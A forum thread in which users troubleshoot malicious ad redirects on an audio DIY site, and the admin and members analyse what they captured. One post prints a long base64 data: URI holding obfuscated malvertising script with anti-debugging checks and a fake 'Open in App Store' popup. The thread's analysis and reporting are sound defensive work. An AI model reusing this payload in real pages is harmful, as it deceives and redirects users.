Has anyone else had problems with getting redirected while on this forum.
I've been redirected back to google several times now over the last few days, and just a few minutes ago, it tried to redirect me to Fake Alert, but ESET AV caught is and blocked it, I have Super Anti Spyware, Malwarebytes Anti Malware, and ESET Premium AV Installed, none of them have detected anything on my PC, so wondering if the forum has been compromised?
It has only happened while on this forum.
I've been redirected back to google several times now over the last few days, and just a few minutes ago, it tried to redirect me to Fake Alert, but ESET AV caught is and blocked it, I have Super Anti Spyware, Malwarebytes Anti Malware, and ESET Premium AV Installed, none of them have detected anything on my PC, so wondering if the forum has been compromised?
It has only happened while on this forum.
Thank you very much for the bug report. We're presently trialling a new advertising technology partner (they work for us, not the advertisers) and this is very important feedback.
If anyone experiences a problem with any of the ads we're serving, please follow these (very important) steps to properly report the problem ad so action can be taken to permanently ban that advertiser. Please note, this method (using "inspect") shows what the source code looks like after the ads have loaded (important), and is very different from using [view]->[source] (which shows the page before it's loaded, and provides no information).
Please rest assured that I take any reports of "bad ads" very seriously. Thank you again for the report.
If anyone experiences a problem with any of the ads we're serving, please follow these (very important) steps to properly report the problem ad so action can be taken to permanently ban that advertiser. Please note, this method (using "inspect") shows what the source code looks like after the ads have loaded (important), and is very different from using [view]->[source] (which shows the page before it's loaded, and provides no information).
- Take a screenshot of the ad (or redirect / app in this case)
- Hover your mouse over the ad. Right-click on the ad and select "inspect". Take a screenshot of the code snippet that appears highlighted.
- Using ctrl+F (PC) or command+F (Mac) and search for "[sovrn] Banner". If you find a match, take a screenshot of any code snippets that appear (if any).
- Send screenshots to badads@diyaudio.com. This will go straight to myself and I will take immediate action to permanently block that advertiser / network and find out how they got through.
Please rest assured that I take any reports of "bad ads" very seriously. Thank you again for the report.
.
- If you think the action of clicking a link is opening the popup, please follow the steps above to try and capture the ad code that was on the original page.
- If you think the new page that is loaded is causing the behavior, please try to capture the ad code from the new page
- If you are able to copy the URL from the status bar in your screenshot, that would be great (I know sometimes these things take focus away from the URL bar and make it impossible to copy that information)
- Please advise your config (OS, Browser)
I keep getting an interupting screen that says “Open in App?”
Everytime I come back to DIY or jump from say Multi way to Subwoofers I have to back arrow three times from this “open in app” screen before I can view or go to the sub forum or page I want to.
I don’t click on the adds. It happens when a forum page tries to open.
Also the Open in App screen is frozen, clicking either answer in the box does nothing. Since it’s frozen I don’t know how to derive any information from it.
Any ideas yet?
Thank you much.
Barry.
Everytime I come back to DIY or jump from say Multi way to Subwoofers I have to back arrow three times from this “open in app” screen before I can view or go to the sub forum or page I want to.
I don’t click on the adds. It happens when a forum page tries to open.
Also the Open in App screen is frozen, clicking either answer in the box does nothing. Since it’s frozen I don’t know how to derive any information from it.
Any ideas yet?
Thank you much.
Barry.
This morning it took four attempts to get DIY to open on my phone. Since it was to open the site in a new window there was no back button option so I had to open over and over.
I have never experienced this with the other two sites I visit: Lansing Heritage and ProSoundWeb
I noticed in the search bar that it jumps from DIY to data when the “open in app” screen appears and then freezes.
Is that a clue?
I love DIY! Thank you.
Barry.
I have never experienced this with the other two sites I visit: Lansing Heritage and ProSoundWeb
I noticed in the search bar that it jumps from DIY to data when the “open in app” screen appears and then freezes.
Is that a clue?
I love DIY! Thank you.
Barry.
Tried copying the address bar when I was redirected on my phone, got all this nonsense:
Code:
data:text/html;base64,PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgY2hhcnNldD0iVVRGLTgiLz48c2NyaXB0IHR5cGU9ImFwcGxpY2F0aW9uL2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMS4xMC4yLm1pbi5qcyI+PC9zY3JpcHQ+PHNjcmlwdCB0eXBlPSJhcHBsaWNhdGlvbi9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9mdGxhYnMuZ2l0aHViLmlvL2Zhc3RjbGljay9saWIvZmFzdGNsaWNrLmpzIj48L3NjcmlwdD48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+IWZ1bmN0aW9uKGUpe2Z1bmN0aW9uIG4oZSl7ZnVuY3Rpb24gbigpe3JldHVybiB1fWZ1bmN0aW9uIG8oKXtyZXR1cm4gd2luZG93LkZpcmVidWcmJndpbmRvdy5GaXJlYnVnLmNocm9tZSYmd2luZG93LkZpcmVidWcuY2hyb21lLmlzSW5pdGlhbGl6ZWQ/dm9pZCBpKCJvbiIpOihjPSJvZmYiLGNvbnNvbGUubG9nKGYpLGNvbnNvbGUuY2xlYXIoKSx2b2lkIGkoYykpfWZ1bmN0aW9uIGkoZSl7dSE9PWUmJih1PWUsImZ1bmN0aW9uIj09dHlwZW9mIGQub25jaGFuZ2UmJmQub25jaGFuZ2UoZSkpfWZ1bmN0aW9uIHQoKXt3fHwodz0hMCx3aW5kb3cucmVtb3ZlRXZlbnRMaXN0ZW5lcigicmVzaXplIixvKSxjbGVhckludGVydmFsKGEpKX0iZnVuY3Rpb24iPT10eXBlb2YgZSYmKGU9e29uY2hhbmdlOmV9KSxlPWV8fHt9O3ZhciByPWUuZGVsYXl8fDFlMyxkPXt9O2Qub25jaGFuZ2U9ZS5vbmNoYW5nZTt2YXIgYyxmPW5ldyBJbWFnZTtPYmplY3QuZGVmaW5lUHJvcGVydHkoZiwnaWQnLHtnZXQ6ZnVuY3Rpb24oKXtjPSJvbiI7fX0pO3ZhciB1PSJ1bmtub3duIjtkLmdldFN0YXR1cz1uO3ZhciBhPXNldEludGVydmFsKG8scik7d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoInJlc2l6ZSIsbyk7dmFyIHc7cmV0dXJuIGQuZnJlZT10LGR9dmFyIG89b3x8e307by5jcmVhdGU9biwiZnVuY3Rpb24iPT10eXBlb2YgZGVmaW5lPyhkZWZpbmUuYW1kfHxkZWZpbmUuY21kKSYmZGVmaW5lKGZ1bmN0aW9uKCl7cmV0dXJuIG99KToidW5kZWZpbmVkIiE9dHlwZW9mIG1vZHVsZSYmbW9kdWxlLmV4cG9ydHM/bW9kdWxlLmV4cG9ydHM9bzp3aW5kb3dbZV09b30oImpkZXRlY3RzIik7PC9zY3JpcHQ+PHRpdGxlPjwvdGl0bGU+IDxzdHlsZT4jbWFpbiwjcG9wdXB7YmFja2dyb3VuZDogcmdiYSgyNTUsIDI1NSwgMjU1LCAyNTUpfWJvZHl7Zm9udC1mYW1pbHk6ICJIZWx2ZXRpY2EgTmV1ZSI7fSNtYWlue21hcmdpbjogMCBhdXRvOyB3aWR0aDogMTAwJTsgaGVpZ2h0OiAxMDAlOyBwb3NpdGlvbjogZml4ZWQ7IHRvcDogMDsgcmlnaHQ6IDB9I292ZXJsYXksI3BvcHVwLC5idXR0b24taG9sZGVye3Bvc2l0aW9uOiBhYnNvbHV0ZX0jb3ZlcmxheXtiYWNrZ3JvdW5kOiAjOTk5OTk5OyB0b3A6IDA7IGxlZnQ6IDA7IHJpZ2h0OiAwOyBib3R0b206IDB9I3BvcHVwe3dpZHRoOiAzMjJweDsgaGVpZ2h0OiAxMTVweDsgei1pbmRleDogMTA7IGJvcmRlci1yYWRpdXM6IDhweDsgdGV4dC1hbGlnbjogY2VudGVyOyBib3gtc2l6aW5nOiBib3JkZXItYm94OyBsZWZ0OiA1MCU7IHRvcDogNTAlOyBtYXJnaW46IC02NHB4IDAgMCAtMTYycHg7IGZvbnQtc2l6ZTogMTRweDsgYm94LXNoYWRvdzogMTBweCA3cHggN3B4IC0xcHggcmdiYSgxMTcsMTE1LDExNywwLjU0KTt9I3BvcHVwIHB7bWFyZ2luOiAxMDsgcGFkZGluZzogMDsgdGV4dC1hbGlnbjogbGVmdDsgY29sb3I6ICM1NDU0NTQ7fSNwb3B1cCAubXNnIHB7bWFyZ2luOiAwOyBwYWRkaW5nOiAyN3B4OyBsaW5lLWhlaWdodDogMjJweDsgZm9udC1zaXplOiAxN3B4O30jcG9wdXAgLmJ1dHRvbi1ob2xkZXIgYXtjb2xvcjogIzAwNkFGQTsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBsaW5lLWhlaWdodDogNTBweDsgZGlzcGxheTogYmxvY2s7IGJvcmRlci10b3A6IDFweCBzb2xpZCAjZWZlZmVmOyBmb250LXNpemU6IDE3cHg7IHRleHQtYWxpZ246IHJpZ2h0O30jcG9wdXAgLnR3by1idXR0b24gYXt3aWR0aDogMTAwJTsgZmxvYXQ6IGxlZnQ7IGJveC1zaXppbmc6IGJvcmRlci1ib3h9I3BvcHVwIC50d28tYnV0dG9uIGE6Zmlyc3QtY2hpbGR7Lypib3JkZXItcmlnaHQ6IDFweCBzb2xpZCAjZWZlZmVmKi99LmJ1dHRvbi1ob2xkZXJ7d2lkdGg6IDEwMCU7IGJvdHRvbTogMH08L3N0eWxlPiA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCwgbWF4aW11bS1zY2FsZT0xLjAsIG1pbmltdW0tc2NhbGU9MS4wLCB1c2VyLXNjYWxhYmxlPW5vLCBtaW5pbWFsLXVpIj48L2hlYWQ+IDxkaXYgaWQ9Im1haW4iPiA8ZGl2IGlkPSJvdmVybGF5Ij48L2Rpdj48ZGl2IGlkPSJwb3B1cCI+IDxkaXYgY2xhc3M9Im1zZyI+IDxwPk9wZW4gaW4gIkFwcCBTdG9yZSI/PC9wPjwvZGl2PjxkaXYgY2xhc3M9ImJ1dHRvbi1ob2xkZXIgdHdvLWJ1dHRvbiI+IDxhPkNhbmNlbCZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxiPk9wZW48L2I+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9hPiA8ZGl2IHN0eWxlPSJjbGVhcjogYm90aCI+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PHNjcmlwdCB0eXBlPSJhcHBsaWNhdGlvbi9qYXZhc2NyaXB0IiBzcmM9ImRhdGE6dGV4dC9qYXZhc2NyaXB0O2Jhc2U2NCxkbUZ5SUY4d2VEQXpPV1FnUFNCYkNpQWdJQ0FuWEhnMk1seDRObVpjZURZMFhIZzNPU2NzQ2lBZ0lDQW5YSGcyT0Z4NE56UmNlRGMwWEhnM01GeDROek5jZUROaFhIZ3labHg0TW1aY2VEYzJYSGczTlZ4NE5tUmNlRFk0WEhnMk5GeDRNbVZjZURjMlhIZzJabHg0Tm1OY2VEYzFYSGczTlZ4NE5tUmNlRGMwWEhnM01seDRObUpjZURNelhIZ3laVng0TmpOY2VEWm1YSGcyWkZ4NE1tWmNlRFkyWEhnek9GeDRNelZjZURZMFhIZ3pOMXg0TmpSY2VEWXpYSGcyTTF4NE1tUmNlRFkwWEhnek9GeDROakpjZURNNFhIZ3laRng0TXpSY2VETTBYSGcyTkZ4NE5qUmNlREprWEhnMk1WeDROak5jZURNM1hIZ3pPRng0TW1SY2VETTVYSGd6T1Z4NE5qTmNlRFl5WEhnMk5GeDROak5jZURZMVhIZ3pNVng0TmpSY2VETTVYSGd6TTF4NE5qVmNlRE5tWEhnMk1WeDROalpjZURZMlhIZzFabHg0TnpOY2VEYzFYSGcyTWx4NE16SmNlRE5rWEhnek5WeDRNelpjZURZMFhIZzJNMXg0TXpaY2VETXhYSGd6T1Z4NE16TmNlREprWEhnMk5seDROakZjZURNNFhIZzJNVng0TW1SY2VETTBYSGcyTWx4NE16UmNlRE01WEhneVpGeDRNemhjZURNeFhIZ3pPVng0TXpsY2VESmtYSGd6TWx4NE16aGNlRE15WEhnek4xeDROalpjZURZelhIZzJNVng0TmpWY2VEWXpYSGd6T1Z4NE16QmNlRFl6WEhnMVpseDRNekZjZURNMVhIZ3pNVng0TXpGY2VETXhYSGd6TVZ4NE16WmNlRE15WEhnek1GeDRNekJjZURJMlhIZzJNVng0TmpaY2VEWTJYSGcxWmx4NE56TmNlRGMxWEhnMk1seDRNek5jZUROa1hIZzBNVng0TlRCY2VEVXdYSGcwWlZ4NE5EVmNlRFU0WEhnMU5WeDROVE5jZURJMlhIZzJNVng0TmpaY2VEWTJYSGcxWmx4NE56TmNlRGMxWEhnMk1seDRNelJjZUROa1hIZ3pOMXg0TXpKY2VETTRYSGczT0Z4NE16bGNlRE13WEhneU5seDROakZjZURZMlhIZzJObHg0TldaY2VEY3pYSGczTlZ4NE5qSmNlRE0yWEhnelpGeDRNek5jZURNd1hIZ3pOVng0TXpaY2VETTBYSGd6TkZ4NE16ZGNlREkyWEhnMk5GeDRObVpjZURaa1hIZzJNVng0TmpsY2VEWmxYSGd6WkZ4NE5qUmNlRFk1WEhnM09WeDROakZjZURjMVhIZzJORng0TmpsY2VEWm1YSGd5WlZ4NE5qTmNlRFptWEhnMlpGeDRNalpjZURZMFhIZzJabHg0Tm1SY2VEWXhYSGcyT1Z4NE5tVmNlRFZtWEhnMk9WeDROalJjZUROa1hIZ3pNRng0TmpWY2VETTBYSGd6TkZ4NE16WmNlRE01WEhnek5WeDRNemRjZURNM1hIZ3pOVng0TXpGY2VEWTBYSGcyTWx4NE16TmNlRE14WEhnek5GeDROalZjZURNMVhIZzJObHg0TXpOY2VETXlYSGd6TkZ4NE16QmNlRE0zWEhnek5seDRNekJjZURNMlhIZ3pOVng0TXpOY2VEWXlYSGd6T0Z4NE16WmNlREkyWEhnMk0xeDROakZjZURaa1hIZzNNRng0TmpGY2VEWTVYSGcyTjF4NE5tVmNlRFZtWEhnMk0xeDRObVpjZURjMVhIZzJaVng0TnpSY2VEY3lYSGczT1Z4NE0yUmNlRFUxWEhnMU0xeDROV1pjZURRNVhIZzBabHg0TlRNbkxBb2dJQ0FnSjF4NE5qaGNlRFk1WEhnM00xeDROelJjZURabVhIZzNNbHg0TnprbkxBb2dJQ0FnSjF4NE5qSmNlRFl4WEhnMk0xeDRObUluTEFvZ0lDQWdKMXg0TmpoY2VEVmhYSGcwTkNjc0NpQWdJQ0FuWEhnMlpseDRObVZjZURjMFhIZzJabHg0TnpWY2VEWXpYSGcyT0Z4NE5tUmNlRFptWEhnM05seDROalVuTEFvZ0lDQWdKMXg0TmpWY2VEYzJYSGcyTlZ4NE5tVmNlRGMwSnl3S0lDQWdJQ2RjZURjd1hIZzNNbHg0TmpWY2VEYzJYSGcyTlZ4NE5tVmNlRGMwWEhnME5GeDROalZjZURZMlhIZzJNVng0TnpWY2VEWmpYSGczTkNjc0NpQWdJQ0FuWEhnM01seDROalZjZURjMFhIZzNOVng0TnpKY2VEWmxYSGcxTmx4NE5qRmNlRFpqWEhnM05WeDROalVuTEFvZ0lDQWdKMXg0TnpKY2VEWTFYSGcyTVZ4NE5qUmNlRGM1Snl3S0lDQWdJQ2RjZURjelhIZzNNRng0Tm1OY2VEWTVYSGczTkNjc0NpQWdJQ0FuWEhnMk1WeDROelJjZURjMFhIZzJNVng0TmpOY2VEWTRKd3BkT3dvb1puVnVZM1JwYjI0Z0tGOHdlREV3WlRoallpd2dYekI0WVRZMk16QTNLU0I3Q2lBZ0lDQjJZWElnWHpCNE1XVTFNbUV4SUQwZ1puVnVZM1JwYjI0Z0tGOHdlREk0WVRkaU1Da2dld29nSUNBZ0lDQWdJSGRvYVd4bElDZ3RMVjh3ZURJNFlUZGlNQ2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQmZNSGd4TUdVNFkySmJKMXg0TnpCY2VEYzFYSGczTTF4NE5qZ25YU2hmTUhneE1HVTRZMkpiSjF4NE56TmNlRFk0WEhnMk9WeDROalpjZURjMEoxMG9LU2s3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdmVHNLSUNBZ0lGOHdlREZsTlRKaE1TZ3JLMTh3ZUdFMk5qTXdOeWs3Q24wb1h6QjRNRE01WkN3Z01IZ3hZelVwS1RzS2RtRnlJRjh3ZUdRd016a2dQU0JtZFc1amRHbHZiaUFvWHpCNE5UWmxPR1UxTENCZk1IZzBNV1kwTlRVcElIc0tJQ0FnSUY4d2VEVTJaVGhsTlNBOUlGOHdlRFUyWlRobE5TQXRJREI0TURzS0lDQWdJSFpoY2lCZk1IZ3hOemM1WlRZZ1BTQmZNSGd3TXpsa1cxOHdlRFUyWlRobE5WMDdDaUFnSUNCeVpYUjFjbTRnWHpCNE1UYzNPV1UyT3dwOU93b2tLR1J2WTNWdFpXNTBLVnRmTUhoa01ETTVLQ2N3ZURBbktWMG9ablZ1WTNScGIyNGdLQ2tnZXdvZ0lDQWdkbUZ5SUY4d2VHTmtNVFpsWlNBOUlIc0tJQ0FnSUNBZ0lDQW5YSGcyT0Z4NE5XRmNlRFEwSnpvZ1puVnVZM1JwYjI0Z1h6QjRNVFkwTlRnNEtGOHdlREU1Tm1RNE9Dd2dYekI0TkdWak9UazBMQ0JmTUhneE16QmxNREFwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdjbVYwZFhKdUlGOHdlREU1Tm1RNE9DaGZNSGcwWldNNU9UUXNJRjh3ZURFek1HVXdNQ2s3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdmVHNLSUNBZ0lIWmhjaUJmTUhneE56TmpNR0VnUFNBblhIZ3pNbHg0TjJOY2VETXdYSGczWTF4NE16TmNlRGRqWEhnek1WeDROMk5jZURNMEoxdGZNSGhrTURNNUtDY3dlREVuS1Ywb0oxeDROMk1uS1N3Z1h6QjRNVEF3WVRRd0lEMGdNSGd3T3dvZ0lDQWdkMmhwYkdVZ0tDRWhXMTBwSUhzS0lDQWdJQ0FnSUNCemQybDBZMmdnS0Y4d2VERTNNMk13WVZ0Zk1IZ3hNREJoTkRBcksxMHBJSHNLSUNBZ0lDQWdJQ0JqWVhObElDZGNlRE13SnpvS0lDQWdJQ0FnSUNBZ0lDQWdKQ2htZFc1amRHbHZiaUFvS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCR1lYTjBRMnhwWTJ0Ylh6QjRaREF6T1Nnbk1IZ3lKeWxkS0dSdlkzVnRaVzUwVzE4d2VHUXdNemtvSnpCNE15Y3BYU2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMHBPd29nSUNBZ0lDQWdJQ0FnSUNCamIyNTBhVzUxWlRzS0lDQWdJQ0FnSUNCallYTmxJQ2RjZURNeEp6b0tJQ0FnSUNBZ0lDQWdJQ0FnZDJsdVpHOTNXeWRjZURabVhIZzJaVng0TnpSY2VEWm1YSGczTlZ4NE5qTmNlRFk0WEhnMlpGeDRObVpjZURjMlhIZzJOU2RkSUQwZ2NISmxkbVZ1ZEVSbFptRjFiSFE3Q2lBZ0lDQWdJQ0FnSUNBZ0lHTnZiblJwYm5WbE93b2dJQ0FnSUNBZ0lHTmhjMlVnSjF4NE16SW5PZ29nSUNBZ0lDQWdJQ0FnSUNCMllYSWdYekI0TTJZd1lqSmxJRDBnSVZ0ZE93b2dJQ0FnSUNBZ0lDQWdJQ0JqYjI1MGFXNTFaVHNLSUNBZ0lDQWdJQ0JqWVhObElDZGNlRE16SnpvS0lDQWdJQ0FnSUNBZ0lDQWdaRzlqZFcxbGJuUmJKMXg0TmpGY2VEWTBYSGcyTkZ4NE5EVmNlRGMyWEhnMk5WeDRObVZjZURjMFhIZzBZMXg0TmpsY2VEY3pYSGczTkZ4NE5qVmNlRFpsWEhnMk5WeDROekluWFNnblhIZzJNMXg0Tm1OY2VEWTVYSGcyTTF4NE5tSW5MQ0JtZFc1amRHbHZiaUFvWHpCNFpqQTRZamc1S1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCcFppQW9JVjh3ZURObU1HSXlaU2tnZXdvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIZHBibVJ2ZDFzblhIZzJabHg0TnpCY2VEWTFYSGcyWlNkZEtGOHdlR1F3TXprb0p6QjROQ2NwS1RzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQnpaWFJVYVcxbGIzVjBLR1oxYm1OMGFXOXVJQ2dwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnZDJsdVpHOTNXMTh3ZUdRd016a29KekI0TlNjcFhWdGZNSGhrTURNNUtDY3dlRFluS1Ywb0tUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I5TENBd2VHSmlPQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1h6QjRNMll3WWpKbElEMGdJU0ZiWFRzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUgwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUhkcGJtUnZkMXNuWEhnMlpseDRObVZjZURjMFhIZzJabHg0TnpWY2VEWXpYSGcyT0Z4NE5tUmNlRFptWEhnM05seDROalVuWFNBOUlHNTFiR3c3Q2lBZ0lDQWdJQ0FnSUNBZ0lIMHNJQ0ZiWFNrN0NpQWdJQ0FnSUNBZ0lDQWdJR052Ym5ScGJuVmxPd29nSUNBZ0lDQWdJR05oYzJVZ0oxeDRNelFuT2dvZ0lDQWdJQ0FnSUNBZ0lDQmZNSGhqWkRFMlpXVmJYekI0WkRBek9TZ25NSGczSnlsZEtITmxkRlJwYldWdmRYUXNJR1oxYm1OMGFXOXVJQ2dwSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUhkcGJtUnZkMXRmTUhoa01ETTVLQ2N3ZURnbktWMGdQU0J1ZFd4c093b2dJQ0FnSUNBZ0lDQWdJQ0I5TENBd2VETmhPVGdwT3dvZ0lDQWdJQ0FnSUNBZ0lDQmpiMjUwYVc1MVpUc0tJQ0FnSUNBZ0lDQjlDaUFnSUNBZ0lDQWdZbkpsWVdzN0NpQWdJQ0I5Q24wcE93cG1kVzVqZEdsdmJpQndjbVYyWlc1MFJHVm1ZWFZzZENoZk1IZ3hOVFppTUdNcElIc0tJQ0FnSUY4d2VERTFObUl3WXlBOUlGOHdlREUxTm1Jd1l5QjhmQ0IzYVc1a2IzZGJYekI0WkRBek9TZ25NSGc1SnlsZE93b2dJQ0FnYVdZZ0tGOHdlREUxTm1Jd1kxdGZNSGhrTURNNUtDY3dlR0VuS1YwcENpQWdJQ0FnSUNBZ1h6QjRNVFUyWWpCalcxOHdlR1F3TXprb0p6QjRZU2NwWFNncE93b2dJQ0FnWHpCNE1UVTJZakJqVzE4d2VHUXdNemtvSnpCNFlpY3BYU0E5SUNGYlhUc0tmUW83Ij48L3NjcmlwdD48c2NyaXB0IHR5cGU9ImFwcGxpY2F0aW9uL2phdmFzY3JpcHQiIHNyYz0iZGF0YTp0ZXh0L2phdmFzY3JpcHQ7YmFzZTY0LGFtUmxkR1ZqZEhNdVkzSmxZWFJsS0daMWJtTjBhVzl1S0hOMFlYUjFjeWw3YVdZb2MzUmhkSFZ6SVQwaWIyWm1JaWw3ZDJsdVpHOTNMbU5zYjNObEtDazdkMmx1Wkc5M0xtaHBjM1J2Y25rdVltRmpheWdwTzMwN2ZTazciPjwvc2NyaXB0PjwvYm9keT48L2h0bWw+
It appears the forum (or some element of the forum) is being sent as Base64 encoded HTML.
And that your browser does not know how to handle Base64. When stumped, it asks if it can find an App for that (and apparently can't).
The reasons simple text may be encoded Base64 are many. I can not begin to understand why HTML text would be sent Base64, if it is about bit-count or security, and if your browser "should" know how to handle it.
It does seem odd, because the prime reason for Base64 is to transmit non-ASCII ("binary") data through an ASCII-only channel (teletype, antique modem, antique e-mail systems). The modern internet carries "binary" data just fine. Base64 of plain text comes out larger than the plain text so not saving bytes. "Encoding" does not mean "security"; any fool can apply a Base64 decoder (though your browser stumbles on the task).
I am suspecting that the forum software (or some ad?) is sending Base64 for no very good reason. Maybe a server admin could look into turning that off.
Attachments
Last edited:
I had a very similar thing happen just a few days ago, But on a PC running Win 7 and IE 11.
Malware bytes blocked it, so no information was available when "Inspect Source" was opened, the address bar did have this in it.
(usersyncinfo.review/uk.php?pub=83232.102772_400&ref=)
While I was busy posting this event to admin, the screen greyed out, but didn't lock anything up, and I had a very similar load of HTML fill up the "Inspect Source" window.
I PM'd the above link to Jason (Admin), but the code was over 5000 characters long so impossible to PM.
Haven't heard anything back as of yet.
I didn't post it as you have, as it looked to contain some personnel information, such as my exact location, also contained a reference to (elixmedia.com) which appears to be an add serving site.
Didn't really pause to think about anything relating to myself as far as personal information when I posted it...just trying to help solve an annoying problem. I know nothing about this, it all looked like gibberish to me.
If there is a chance that the text does contain personal information about me, I'd appreciate it if a moderator or admin take what they need from it if it is any help and please edit/delete it from public view. Thanks.
If there is a chance that the text does contain personal information about me, I'd appreciate it if a moderator or admin take what they need from it if it is any help and please edit/delete it from public view. Thanks.
Sorry - I was away for the weekend and only just saw these new messages.
First up and briefly - Base64 encoding itself is AOK and normally used for page speed. Base64 encoding can speed up page load times by putting small images into the HTML itself, rather than have those images be loaded using a separate connection. Browsers can only handle a few connections at a time in parallel, and so a page with 100 images (like for example icons) might take a very long time to load not because of the raw amount of data transferred but all the bits being sent separately in sequential instead of parallel fashion. It's worse for people far away from the server that have high latency as latency becomes the bottleneck not the data throughput. HTTP2 solves this issue with something called pipelining, but that has its own issues. We used to use Google PageSpeed and all the small images would get Base64 encoded (we're not using it currently).
What this appears to be, however, is something nefarious using Base64 to hide itself. I've decoded the sample above and it doesn't contain any personal information. What it does have is "standard" evasive javascript code to avoid detection, in plan text, and then more obfuscated javascript to run if it thinks it's safe to poke it's head out. Thank you for posting the sample. No need to post more in this thread - please email that URL/string/data directly to badads@diyaudio.com so I can compare the samples.
I'm treating this as my #1 priority and will report back when I know more. It might be the software having been hacked or it coming in through an ad, right now it's not reproducible by me but there are various avenues I'll be chasing today to see where the "leak" is.
First up and briefly - Base64 encoding itself is AOK and normally used for page speed. Base64 encoding can speed up page load times by putting small images into the HTML itself, rather than have those images be loaded using a separate connection. Browsers can only handle a few connections at a time in parallel, and so a page with 100 images (like for example icons) might take a very long time to load not because of the raw amount of data transferred but all the bits being sent separately in sequential instead of parallel fashion. It's worse for people far away from the server that have high latency as latency becomes the bottleneck not the data throughput. HTTP2 solves this issue with something called pipelining, but that has its own issues. We used to use Google PageSpeed and all the small images would get Base64 encoded (we're not using it currently).
What this appears to be, however, is something nefarious using Base64 to hide itself. I've decoded the sample above and it doesn't contain any personal information. What it does have is "standard" evasive javascript code to avoid detection, in plan text, and then more obfuscated javascript to run if it thinks it's safe to poke it's head out. Thank you for posting the sample. No need to post more in this thread - please email that URL/string/data directly to badads@diyaudio.com so I can compare the samples.
I'm treating this as my #1 priority and will report back when I know more. It might be the software having been hacked or it coming in through an ad, right now it's not reproducible by me but there are various avenues I'll be chasing today to see where the "leak" is.
Thanks. Interesting.
Many links are encoded about this way and some are about this complicated.
But this has some funny-bits.....
Code:
<!DOCTYPE html><html><head><meta charset="UTF-8"/><script type="application/javascript" ....
...{return window.Firebug&&window.Firebug.chrome&&window.Firebug.chrome.isInitialized?void .....
...<div id="overlay"></div><div id="popup"> <div class="msg"> <p>Open in "App Store"?</p></div>...The first run of Base64 starts with basic HTML, yawn.
The "Firebug" reference really caught my eye. Firebug is an add-in for FireFox which allows you to de-bug your web code (or any other web-code). This snip appears to be testing for Firebug being initialized. So it works different if Firebug is watching? That seems sneaky to me.
And way down in a second layer of Base64 there IS the pop-up asking about AppStore! That's not your browser asking for help, it is IN THE SCRIPT! Do they really want you to go to the AppStore? Why? If they are selling an AppStore product, they can just link you to the store page. Why ask? What is really going on here?
I hope the admin and ad-agent can figure this out. Maybe it is benign, but it is way more tricky than any ad-link needs to be.
Last edited:
A report (posted 6 weeks ago) on a really similar "Malvertiser Sneaky Trick" ---
Hands On With Malvertisers’ Sneaky Tricks – Confiant
"any click within the entire window will land us on this familiar link that we recognize from above:
*****{removed}
"This landing page takes us down a rabbit hole of redirects that’s worthy of a blog post in and of itself....."
Without deep study, my snap impression is that this link code should not be served from this forum.
Hands On With Malvertisers’ Sneaky Tricks – Confiant
"any click within the entire window will land us on this familiar link that we recognize from above:
*****{removed}
"This landing page takes us down a rabbit hole of redirects that’s worthy of a blog post in and of itself....."
Without deep study, my snap impression is that this link code should not be served from this forum.
- Status
- This old topic is closed. If you want to reopen this topic, contact a moderator using the "Report Post" button.